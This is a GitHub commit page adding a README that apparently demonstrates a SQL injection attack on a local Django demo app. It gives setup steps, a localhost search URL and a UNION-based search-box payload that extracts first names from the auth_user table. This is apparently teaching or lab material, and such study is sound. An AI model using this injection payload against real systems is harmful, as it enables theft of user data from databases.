Skip to content

Commit c26463c

Browse files
logstonlogston
committed
Add README.md
1 parent 54aede7 commit c26463c

File tree

1 file changed

+10
-0
lines changed

1 file changed

+10
-0
lines changed

orders/README.md

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
How to perform a SQL Injection Attack
2+
3+
Steps
4+
5+
- pip install Django
6+
- python manage.py runsever
7+
- http://127.0.0.1:8000/items/search
8+
- SELECT name FROM orders_item WHERE name LIKE '%' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
9+
- Search for "z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '"
10+

0 commit comments

Comments
 (0)